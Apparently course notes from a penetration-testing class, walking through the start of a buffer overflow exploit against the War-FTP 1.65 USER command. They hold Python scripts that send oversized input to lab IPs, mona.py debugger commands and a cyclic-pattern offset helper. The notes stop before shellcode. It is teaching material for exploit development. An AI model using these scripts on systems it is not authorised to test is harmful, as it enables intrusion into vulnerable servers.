Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
* Give the program too much input in the username (USER) field
* The saved return pointer will be overwritten with our attacker-controlled input

I. Exploit Skeleton -> War-FTP 1.65 USER Buffer Overflow

```python
#!/usr/bin/python
# Python 2 syntax, as used in the course
import socket

# 1100 bytes of "A": long enough to overrun the USER buffer and clobber the saved return pointer
buffer = "A" * 1100

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.5.44', 21))
response = s.recv(1024)          # FTP banner
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)          # server reply to the oversized USER command
print response
s.send('PASS PASSWORD\r\n')
s.close()
```

II. Immunity Debugger -> Attach to the Process

III. Mona.py

An exploit development plugin for Immunity Debugger and WinDbg by the Corelan Team.

Set up logging: !mona config -set workingfolder C:\logs\%p

Identifying the overwrite: !mona pattern_create 1100

IV. Mona findmsp

Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory. It reports whether the pattern landed in the registers (e.g. EIP) and the offset of that value from the beginning of the pattern.

Verifying Offsets

```python
#!/usr/bin/python
# Python 2 syntax, as used in the course
import socket

# Offset found with findmsp: 485 bytes of padding, then 4 bytes ("B") that should
# land in EIP, then filler ("C") to keep the total length at 1100
buffer = "A" * 485 + "B" * 4 + "C" * 611

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.20.10', 21))
response = s.recv(1024)          # FTP banner
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)
print response
s.send('PASS PASSWORD\r\n')
s.close()
```
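The pattern_create / findmsp step above, as an added Python 3 example that is not the course's or mona's code: it generates the same style of cyclic pattern and maps the 4 bytes found in a register back to an offset, including the little-endian reversal needed when the value is taken from the debugger's hex display of EIP. The offset 485 and the sample EIP value are assumed here only as constructed sample values.

```python
import string


def pattern_create(length):
    """Build a Metasploit/mona-style cyclic pattern (Aa0Aa1Aa2...).

    Every (Upper, lower, digit) triple is unique, so any 4-byte window is
    unique within the first 20280 bytes and pins down a single offset.
    """
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=1100):
    """Return the offset of `value` inside the pattern, or -1 if absent.

    `value` is either the 4 ASCII bytes seen in a register or a hex word
    as a debugger shows it (e.g. '0x32714131'). The hex form is what the
    CPU loaded little-endian, so its bytes are reversed before searching.
    """
    if value.lower().startswith("0x"):
        raw = bytes.fromhex(value[2:].zfill(8))[::-1].decode("ascii")
    else:
        raw = value
    return pattern_create(length).find(raw)


if __name__ == "__main__":
    pat = pattern_create(1100)
    # Constructed sample: pretend the 4 bytes at offset 485 ended up in EIP
    eip_bytes = pat[485:489]
    print("bytes in EIP:", eip_bytes, "-> offset", pattern_offset(eip_bytes))
    print("debugger view 0x32714131 -> offset", pattern_offset("0x32714131"))
```

The second call shows the case that trips people up: the debugger prints EIP as 0x32714131, which is "1Aq2" once the bytes are put back in memory order.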
Author: Vitali Kremez
July 2016